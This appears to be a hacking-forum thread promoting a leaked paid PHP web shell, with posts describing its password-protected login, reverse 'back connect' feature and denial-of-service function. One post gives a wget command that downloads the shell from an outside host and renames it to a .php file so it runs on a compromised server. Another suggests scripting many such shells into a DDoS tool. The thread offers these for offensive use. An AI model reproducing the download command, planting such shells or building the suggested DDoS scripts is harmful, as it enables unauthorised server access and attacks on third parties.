Ok, here's a pretty cool shell I use. Here's a screen shot (many more functions you can't see). It comes with a login and password prompt to protect your shell.

You want to change your password here:

Obviously change to what you want it to be.

if you want to use this shell and have cmd execution you could run something like:

wget http://the.worldend.in/syr.txt&&mv syr.txt syr.php

then the shell would be on the server as syr.php

This is the real $50 version, guys. The one Syrian Eagle was selling before his site went down a while back.
Much better than the public version 3 and "7" which is just a re-theme of 3.

I could procure them but I can't get them within a reasonable amount of time (a few hours). They're all public stuff anyway.

This shell has a great back connect feature as well that's pretty interactive as far as php back connects go. I highly recommend it.

The login page is great too. Not very easy to brute if you set your username and password correctly.

It just crossed my mind that it would be good to get them on a server at some point for completeness and update the source. I'll see if I have more time later and go hunt for them.

You can also write a simple python script to use these shells as a ddos'r. Just use the URL and login and pass and use the built in dos feature.

Looks great although too bad the cgi scripts etc don't work.

Remember this is a paid shell that is being released. Would cost ya $50 so make use of it while it's out there. It has a lot of features and may look cluttered but it works just fine. Like I said the backconnect feature is great and it really is a high quality shell I wanted to share with the community.
